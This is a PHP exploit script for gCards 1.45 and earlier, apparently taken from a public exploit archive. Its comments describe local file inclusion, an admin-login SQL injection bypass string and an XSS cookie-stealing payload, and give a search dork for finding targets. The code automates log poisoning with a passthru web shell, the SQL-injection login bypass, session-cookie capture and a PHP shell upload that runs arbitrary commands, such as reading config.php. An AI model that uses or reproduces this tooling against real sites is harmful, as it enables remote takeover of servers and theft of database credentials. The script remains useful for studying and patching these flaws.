gCards - Multiple Vulnerabilities

1. <?
2. echo "gCards <= 1.45 multiple vulnerabilities\r\n";
3. echo "by rgod [email protected]\r\n";
4. echo "site: http://retrogod.altervista.org\r\n\r\n";
5. echo "Sun-Tzu:\"At first, then, exhibit the coyness of a maiden, until the\r\n";
6. echo "enemy gives you an opening; afterwards emulate the rapidity of a\r\n";
7. echo "running hare, and it will be too late for the enemy to oppose you.\"\r\n";
8.  
9. echo "dork: \"powered by gcards\"\r\n\r\n";
10.  
11. /*
12.  
13. explaination:
14. software site: http://www.gregphoto.net/gcards/index.php
15.  
16. i) vulnerable code in inc/setLang.php:
17.  
18. <?
19.     if ($page->languageredirect == $_SERVER['PHP_SELF']) {
20.         if (isset($_GET['setLang'])) $_SESSION['setLang'] = $_GET['setLang'];
21.     }
22.  
23.     $langFile = $page->relpath.'inc/lang/'.$lang[$_SESSION['setLang']]['file'];
24.  
25.     if (file_exists($langFile)) {
26.         include_once($langFile);
27.     }
28.     else {
29.         echo "Could not find language file $langFile";
30.     }
31. ?>
32.  
33. this code is included by main script, so ... arbitrary local inclusion, poc:
34.  
35. http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=../../../../../../../../../../../var/log/httpd/access_log
36.  
37. this works regardless of any magic_quotes_gpc settings, apart open_basedir
38. restrictions obviously
39.  
40. ii) also we have SQL injection in admin authentication procedure, admin/loginfunction.php
41. at lines 28-38:
42.  
43. ...
44.     $username = $_POST['username'];
45.     $userpass = $_POST['userpass'];
46.     if ($username && $userpass)
47.     {
48.         include('../inc/adodb/adodb.inc.php');     # load code common to ADOdb
49.         include('../config.php');
50.         $ADODB_FETCH_MODE = ADODB_FETCH_ASSOC;
51.         $conn = &ADONewConnection('mysql'); # create a connection
52.         $conn->Connect($dbhost,$dbuser,$dbpass,$dbdatabase);
53.         $pass = md5($userpass);
54.         $sqlstmt = "SELECT role FROM ".$tablePrefix."cardusers WHERE username='$username' AND userpass='$pass'";
55. ...
56.  
57. login as admin typing:
58.  
59. username: 'or'suntzu'='suntzu'/*
60. password: [whatever]
61.  
62. this works with magic_quotes_gpc=Off
63.  
64. once you are admin, you can upload php files, files are renamed but gcards keep
65. php extension, so you can launch commands from them
66.  
67. iii)xss:
68.  
69. http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
70.  
71. this exploit does the dirty work for i) and ii)
72.  
73.                                                                              */
74. if ($argc<5) {
75. echo "Usage: php ".$argv[0]." host path action cmd OPTIONS\r\n";
76. echo "host:      target server (ip/hostname)\r\n";
77. echo "path:      path to gcards\r\n";
78. echo "action:    1 - launch commands through arbitrary local inclusion\r\n";
79. echo "               (no php.ini restriction)\r\n";
80. echo "           2 - launch commands through sql injection/admin auth bypass\r\n";
81. echo "               (works with magic_quotes_gpc = Off\r\n";
82. echo "cmd:       a shell command\r\n";
83. echo "Options:\r\n";
84. echo "   -p[port]:    specify a port other than 80\r\n";
85. echo "   -P[ip:port]: specify a proxy\r\n";
86. echo "Examples:\r\n";
87. echo "php ".$argv[0]." localhost /gcards/ 2 cat ./../config.php\r\n";
88. echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php\r\n";
89. echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -p81\r\n";
90. echo "php ".$argv[0]." localhost /gcards/ 1 cat config.php -P1.1.1.1:80\r\n";
91. die;
92. }
93.  
94. error_reporting(0);
95. ini_set("max_execution_time",0);
96. ini_set("default_socket_timeout",5);
97.  
98. function quick_dump($string)
99. {
100.  $result='';$exa='';$cont=0;
101.  for ($i=0; $i<=strlen($string)-1; $i++)
102.  {
103.   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
104.   {$result.="  .";}
105.   else
106.   {$result.="  ".$string[$i];}
107.   if (strlen(dechex(ord($string[$i])))==2)
108.   {$exa.=" ".dechex(ord($string[$i]));}
109.   else
110.   {$exa.=" 0".dechex(ord($string[$i]));}
111.   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
112.  }
113. return $exa."\r\n".$result;
114. }
115. $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
116. function sendpacketii($packet)
117. {
118.  global $proxy, $host, $port, $html, $proxy_regex;
119.  if ($proxy=='') {
120.    $ock=fsockopen(gethostbyname($host),$port);
121.    if (!$ock) {
122.      echo 'No response from '.$host.':'.$port; die;
123.    }
124.  }
125.  else {
126.    $c = preg_match($proxy_regex,$proxy);
127.    if (!$c) {
128.      echo 'Not a valid proxy...';die;
129.    }
130.    $parts=explode(':',$proxy);
131.    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
132.    $ock=fsockopen($parts[0],$parts[1]);
133.    if (!$ock) {
134.      echo 'No response from proxy...';die;
135.    }
136.  }
137.  fputs($ock,$packet);
138.  if ($proxy=='') {
139.    $html='';
140.    while (!feof($ock)) {
141.      $html.=fgets($ock);
142.    }
143.  }
144.  else {
145.    $html='';
146.    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
147.      $html.=fread($ock,1);
148.    }
149.  }
150.  fclose($ock);
151.  #debug
152.  #echo "\r\n".$html;
153. }
154.  
155. function make_seed()
156. {
157.   list($usec, $sec) = explode(' ', microtime());
158.   return (float) $sec + ((float) $usec * 100000);
159. }
160.  
161. $host=$argv[1];
162. $path=$argv[2];
163. $action=$argv[3];
164. $cmd="";$port=80;$proxy="";
165.  
166. for ($i=4; $i<=$argc-1; $i++){
167. $temp=$argv[$i][0].$argv[$i][1];
168. if (($temp<>"-p") and ($temp<>"-P"))
169. {$cmd.=" ".$argv[$i];}
170. if ($temp=="-p")
171. {
172.  $port=str_replace("-p","",$argv[$i]);
173. }
174. if ($temp=="-P")
175. {
176.  $proxy=str_replace("-P","",$argv[$i]);
177. }
178. }
179. $cmd=urlencode($cmd);
180.  
181. if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
182. if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
183.  
184. echo "action selected -> ".$action."\r\n";
185. if ($action=="1")
186. {
187.  echo "[1] Injecting some code in log files...\r\n";
188.  $CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';
189.  $CODE.='passthru($_GET[cmd]);echo 666;die;?>';
190.  $packet.="GET ".$p.$CODE." HTTP/1.1\r\n";
191.  $packet.="User-Agent: ".$CODE."\r\n";
192.  $packet.="Host: ".$host."\r\n";
193.  $packet.="Connection: close\r\n\r\n";
194.  #debug
195.  #echo quick_dump($packet);
196.  sendpacketii($packet);
197.  
198.  # fill with possible locations
199.  $paths= array (
200.  "../../../../../../../../../../var/log/httpd/access_log",
201.  "../../../../../../../../../../var/log/httpd/error_log",
202.  "../apache/logs/error.log",
203.  "../apache/logs/access.log",
204.  "../../apache/logs/error.log",
205.  "../../apache/logs/access.log",
206.  "../../../apache/logs/error.log",
207.  "../../../apache/logs/access.log",
208.  "../../../../apache/logs/error.log",
209.  "../../../../apache/logs/access.log",
210.  "../../../../../../../../../../etc/httpd/logs/acces_log",
211.  "../../../../../../../../../../etc/httpd/logs/acces.log",
212.  "../../../../../../../../../../etc/httpd/logs/error_log",
213.  "../../../../../../../../../../etc/httpd/logs/error.log",
214.  "../../../../../../../../../../var/www/logs/access_log",
215.  "../../../../../../../../../../var/www/logs/access.log",
216.  "../../../../../../../../../../usr/local/apache/logs/access_log",
217.  "../../../../../../../../../../usr/local/apache/logs/access.log",
218.  "../../../../../../../../../../var/log/apache/access_log",
219.  "../../../../../../../../../../var/log/apache/access.log",
220.  "../../../../../../../../../../var/log/access_log",
221.  "../../../../../../../../../../var/www/logs/error_log",
222.  "../../../../../../../../../../var/www/logs/error.log",
223.  "../../../../../../../../../../usr/local/apache/logs/error_log",
224.  "../../../../../../../../../../usr/local/apache/logs/error.log",
225.  "../../../../../../../../../../var/log/apache/error_log",
226.  "../../../../../../../../../../var/log/apache/error.log",
227.  "../../../../../../../../../../var/log/access_log",
228.  "../../../../../../../../../../var/log/error_log"
229.  );
230.  
231.  for ($i=0; $i<=count($paths)-1; $i++)
232.  {
233.    $j=$i+2;
234.    echo "[".$j."] Trying with ".$paths[$i]."\r\n";
235.    $xpl=urlencode($paths[$i]);
236.    $packet ="GET ".$p."index.php?cmd=".$cmd."&setLang=suntzu&lang[suntzu][file]=".$xpl." HTTP/1.0\r\n";
237.    $packet.="Host: ".$host."\r\n";
238.    $packet.="Connection: Close\r\n\r\n";
239.    #debug, shows packets in a nice format
240.    #echo quick_dump($packet);
241.    sendpacketii($packet);
242.  
243.    if (strstr($html,"666")){
244.      echo "Exploit succeeded...\r\n";
245.      $temp=explode("666",$html);
246.      echo $temp[1];
247.      die;
248.    }
249.  }
250.  
251. }
252. else
253. if ($action=="2")
254. {   echo "[1] Injecting some SQL statements in admin login username field...\r\n";
255.    $sql=urlencode("'or'suntzu'='suntzu'/*");
256.    $data="username=".$sql;
257.    $data.="&userpass=suntzu";
258.    $packet ="POST ".$p."admin/admin.php HTTP/1.1\r\n";
259.    $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
260.    $packet.="Host: ".$host."\r\n";
261.    $packet.="Content-Length: ".strlen($data)."\r\n";
262.    $packet.="Connection: Close\r\n\r\n";
263.    $packet.=$data;
264.    #echo quick_dump($packet);
265.    sendpacketii($packet);
266.    if (strstr($html,"gCards Administration Console"))
267.    {echo "Sql injection succeeded...\r\n";}
268.    else
269.    {die("Not succeeded, maybe we have magic_quotes_gpc on here...\r\n");}
270.    $temp=explode("Set-Cookie: ",$html);
271.    $temp2=explode(" ",$temp[1]);
272.    $cookie=$temp2[0];
273.    echo "Cookie -> ".$cookie."\r\n";
274.    echo "[2] Let's retrieve a category name to upload a file in ...\r\n";
275.    $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n";
276.    $packet.="Host: ".$host."\r\n";
277.    $packet.="Cookie: ".$cookie."\r\n";
278.    $packet.="Connection: Close\r\n\r\n";
279.    #echo quick_dump($packet);
280.    sendpacketii($packet);
281.    $temp=explode("<option value=\"",$html);
282.    $temp2=explode("\"",$temp[1]);
283.    $catid=$temp2[0];
284.    echo "catid -> ".$catid."\r\n";
285.    if ($catid=="") {$catid=1;}
286.    echo "[3] Uploading a php file...\r\n";
287. $data='-----------------------------7d613b1d0448
288. Content-Disposition: form-data; name="MAX_FILE_SIZE"
289.  
290. 250000
291. -----------------------------7d613b1d0448
292. Content-Disposition: form-data; name="cardname"
293.  
294. suntzu
295. -----------------------------7d613b1d0448
296. Content-Disposition: form-data; name="catid"
297.  
298. '.$catid.'
299. -----------------------------7d613b1d0448
300. Content-Disposition: form-data; name="userfile"; filename="suntzu.php"
301. Content-Type: application/octet-stream
302.  
303. <?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?>
304. -----------------------------7d613b1d0448
305. Content-Disposition: form-data; name="userthumb"; filename="suntzu.php"
306. Content-Type: application/octet-stream
307.  
308. <?php echo 666;ini_set("max_execution_time",0);passthru($_GET[cmd]);echo 666;?>
309. -----------------------------7d613b1d0448
310. Content-Disposition: form-data; name="submit"
311.  
312. Upload
313. -----------------------------7d613b1d0448
314. ';
315.    $packet ="POST ".$p."admin/upload.php HTTP/1.1\r\n";
316.    $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n";
317.    $packet.="Host: ".$host."\r\n";
318.    $packet.="Content-Length: ".strlen($data)."\r\n";
319.    $packet.="Connection: Close\r\n";
320.    $packet.="Cookie: ".$cookie."\r\n\r\n";
321.    $packet.=$data;
322.    #echo quick_dump($packet);
323.    sendpacketii($packet);
324.    if (strstr($html,"successfully"))
325.    {echo "Succeeded...\r\n";}
326.    else
327.    {die("For some reason...Not succeeded\r\n");}
328.    echo "[4] Let's retrieve the new filename ...\r\n";
329.    $packet ="GET ".$p."admin/cards.php HTTP/1.1\r\n";
330.    $packet.="Host: ".$host."\r\n";
331.    $packet.="Cookie: ".$cookie."\r\n";
332.    $packet.="Connection: Close\r\n\r\n";
333.    #echo quick_dump($packet);
334.    sendpacketii($packet);
335.    $temp=explode("suntzu.php",$html);
336.    $temp2=explode("<td>",$temp[count($temp)-2]);
337.    $temp=$temp2[count($temp2)-1];
338.    $newfile=$temp."suntzu.php";
339.    if ($newfile=="") {die("For some reason, exploit failed...");}
340.    echo "File renamed to: ".$newfile."\r\n";
341.    echo "[5] Launch commands ...\r\n";
342.    $packet ="GET ".$p."images/".$newfile."?cmd=".$cmd." HTTP/1.1\r\n";
343.    $packet.="Host: ".$host."\r\n";
344.    $packet.="Connection: Close\r\n\r\n";
345.    #echo quick_dump($packet);
346.    sendpacketii($packet);
347.    if (strstr($html,"666"))
348.     {
349.       echo "Exploit succeeded...\r\n";
350.       $temp=explode("666",$html);
351.       echo $temp[1];
352.       die;
353.     }
354. }
355. else
356. {die ("Wrong action...\r\n");}
357. //if you are here...
358. echo "Exploit failed...\r\n";
359. ?>